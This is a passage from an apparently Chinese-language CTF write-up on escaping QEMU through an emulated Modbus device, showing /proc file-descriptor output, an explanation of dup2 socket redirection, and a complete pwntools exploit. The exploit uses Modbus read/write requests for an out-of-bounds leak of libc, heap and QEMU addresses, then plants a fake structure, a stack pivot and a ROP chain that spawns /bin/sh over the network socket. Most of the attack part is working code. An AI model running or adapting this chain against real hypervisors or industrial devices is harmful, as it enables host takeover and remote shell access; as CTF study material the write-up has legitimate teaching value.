lrwx------ 1 ctf ctf 64 Oct 30 10:49 4 -> 'anon_inode:[eventfd]'
lrwx------ 1 ctf ctf 64 Oct 30 10:49 5 -> 'anon_inode:[signalfd]'
lrwx------ 1 ctf ctf 64 Oct 30 10:49 6 -> 'anon_inode:[eventpoll]'
lrwx------ 1 ctf ctf 64 Oct 30 10:49 7 -> 'anon_inode:[eventfd]'
lrwx------ 1 ctf ctf 64 Oct 30 10:49 8 -> 'anon_inode:[eventfd]'
lrwx------ 1 ctf ctf 64 Oct 30 10:49 9 -> 'socket:[276587]'
QEMU 进程的两个 socket 进程描述符分别是:
/proc/170/fd/9 -> socket:[276587]:监听 0.0.0.0:1502 的 listening socket 。
/proc/170/fd/10 -> socket:[274261]:某个客户端连上后 accept() 返回的 已连接 socket 。
因此我们只需要通过 dup2 将 stdin 与 stdout 和 10 绑定即可确保 system("/bin/sh") 交互。
dup2(oldfd, newfd) 就是把 oldfd 这个打开好的文件/套接字复制成编号为 newfd 的描述符 。如果 newfd 原来已经在用,内核会先把它关掉,再让它指向和 oldfd 同一个内核对象 (同一个 “open file description”)。成功后返回值是 newfd。
执行 dup2(10, 0); dup2(10, 1); dup2(10, 2); 等价于把标准输入/输出/错误(0/1/2)接到这个 socket 上 。
于是后续 system("/bin/sh") 启动的 sh 会从 FD 0 读、往 FD 1/2 写——也就是通过这条网络连接进行交互,你的远端就能直接操作 shell。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 fd_guess = 10 rop = b"" rop += p64(next (libc.search(asm('pop rdi; ret;' )))) rop += p64(fd_guess) rop += p64(next (libc.search(asm('pop rsi; ret;' )))) rop += p64(0 ) rop += p64(libc.sym['dup2' ]) rop += p64(next (libc.search(asm('pop rdi; ret;' )))) rop += p64(fd_guess) rop += p64(next (libc.search(asm('pop rsi; ret;' )))) rop += p64(1 ) rop += p64(libc.sym['dup2' ]) rop += p64(next (libc.search(asm('pop rdi; ret;' )))) rop += p64(next (libc.search(b'/bin/sh\x00' ))) rop += p64(libc.address + 0x582d2 )
完整 Exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 from pwn import *import structcontext.log_level = 'info' context.arch = 'amd64' io = remote('127.0.0.1' , 1502 ) def crc16_modbus (b ): crc = 0xFFFF for x in b: crc ^= x for _ in range (8 ): crc = (crc >> 1 ) ^ 0xA001 if (crc & 1 ) else (crc >> 1 ) return crc & 0xFFFF def fc03_req (addr, start, count ): frm = bytearray ([addr & 0xFF , 0x03 ]) frm += struct.pack('>H' , start & 0xFFFF ) frm += struct.pack('>H' , count & 0xFFFF ) frm += struct.pack('<H' , crc16_modbus(frm)) io.send(frm) h = io.recvn(3 ) if h[1 ] & 0x80 : ex = io.recvn(2 ) raise RuntimeError(f"exception frame: {h.hex ()} {ex.hex ()} " ) assert h[1 ] == 0x03 bc = h[2 ] body = io.recvn(bc + 2 ) data, crc = body[:-2 ], body[-2 :] if crc16_modbus(h + data) != int .from_bytes(crc, 'little' ): log.warning("CRC mismatch" ) mem = b"" for i in range (0 , len (data), 2 ): if i + 1 < len (data): mem += data[i + 1 :i + 2 ] + data[i:i + 1 ] return mem def fc10_req (addr, start, data: bytes ): if len (data) % 2 != 0 : log.info("fc10_write: data 为奇数长度,自动在末尾填充 0x00" ) data = data + b"\x00" count = len (data) // 2 if count > 125 : raise ValueError(f"data 过长:count={count} 超出单帧上限 125(受 260 字节 RX 缓冲限制)。请分帧调用。" ) frm = bytearray ([addr & 0xFF , 0x10 ]) frm += struct.pack('>H' , start & 0xFFFF ) frm += struct.pack('>H' , count & 0xFFFF ) frm.append((2 * count) & 0xFF ) for i in range (0 , len (data), 2 ): lo = data[i] hi = data[i + 1 ] hi, lo = lo, hi frm += struct.pack('>H' , (lo | (hi << 8 )) & 0xFFFF ) frm += struct.pack('<H' , crc16_modbus(frm)) io.send(frm) h = io.recvn(2 ) if h[1 ] & 0x80 : ex = io.recvn(3 ) if crc16_modbus(h + ex[:1 ]) != int .from_bytes(ex[1 :], 'little' ): log.warning("FC10 异常帧 CRC 不匹配" ) raise RuntimeError(f"FC10 exception: code=0x{ex[0 ]:02x} " ) body = io.recvn(6 ) if crc16_modbus(h + body[:-2 ]) != int .from_bytes(body[-2 :], 'little' ): log.warning("FC10 响应 CRC 不匹配" ) start_echo = struct.unpack('>H' , body[0 :2 ])[0 ] count_echo = struct.unpack('>H' , body[2 :4 ])[0 ] return start_echo, count_echo libc = ELF("./libc.so.6" ) qemu = ELF("./qemu-system-x86_64" ) leak = fc03_req(0 , (0x10000 - 127 ), 127 )[4 :] print (hexdump(leak))libc.address = u64(leak[0x38 :0x38 + 8 ]) - 0x203b60 success("libc base: " + hex (libc.address)) heap_base = u64(leak[0x48 :0x48 + 8 ]) - 0xa4270 success("heap base: " + hex (heap_base)) qemu.address = u64(leak[0xe0 :0xe0 + 8 ]) - 0x9ea35e success("qemu base: " + hex (qemu.address)) payload_addr = heap_base + 0x82eb0 payload = b"" payload += flat({ 0 : p64(0xdeaddead ), 0x8 : flat({ 0x0 : flat( p32(0 ), p32(0 ), p32(0 ), p32(0 ), p32(0 ), p16(0 ), p16(0 ), p64(0 ), p64(0 ) ), 0x34 : p8(1 ) }), 0x40 : p64(0xbeefbeef ) }) payload = payload.replace(p64(0xbeefbeef ), p64(payload_addr + len (payload))) """ 0x0000000000709c51 : push rax ; add byte ptr [rax - 0x75], cl ; pop rbp ; clc ; leave ; xor eax, eax ; xor edx, edx ; xor ecx, ecx ; xor esi, esi ; xor edi, edi ; ret """ stack_pivot = qemu.address + 0x0000000000709c51 payload += flat({ 0x0 : p64(0 ), 0x10 : p64(stack_pivot), 0x18 : p64(0xdeadbeef ) }) payload = payload.replace(p64(0xdeaddead ), p64(payload_addr + len (payload))) payload += flat({ 0x8 : p32(0 ), 0xc : p8(1 ), }) fd_guess = 10 rop = b"" rop += p64(next (libc.search(asm('pop rdi; ret;' )))) rop += p64(fd_guess) rop += p64(next (libc.search(asm('pop rsi; ret;' )))) rop += p64(0 ) rop += p64(libc.sym['dup2' ]) rop += p64(next (libc.search(asm('pop rdi; ret;' )))) rop += p64(fd_guess) rop += p64(next (libc.search(asm('pop rsi; ret;' )))) rop += p64(1 ) rop += p64(libc.sym['dup2' ]) rop += p64(next (libc.search(asm('pop rdi; ret;' )))) rop += p64(next (libc.search(b'/bin/sh\x00' ))) rop += p64(libc.address + 0x582d2 ) payload += b"a" * 3 payload = payload.replace(p64(0xdeadbeef ), p64(payload_addr + len (payload) - 8 )) payload += rop payload = flat( {23 : payload}, filler=cyclic(250 , n=8 ), length=250 ) info("payload len: " + str (len (payload))) print (hexdump(payload))fc10_req(0 , (0x10000 - 250 // 2 ), payload) fc03_req(0 , 0x10000 - 0x80 , 0x80 ) io.interactive()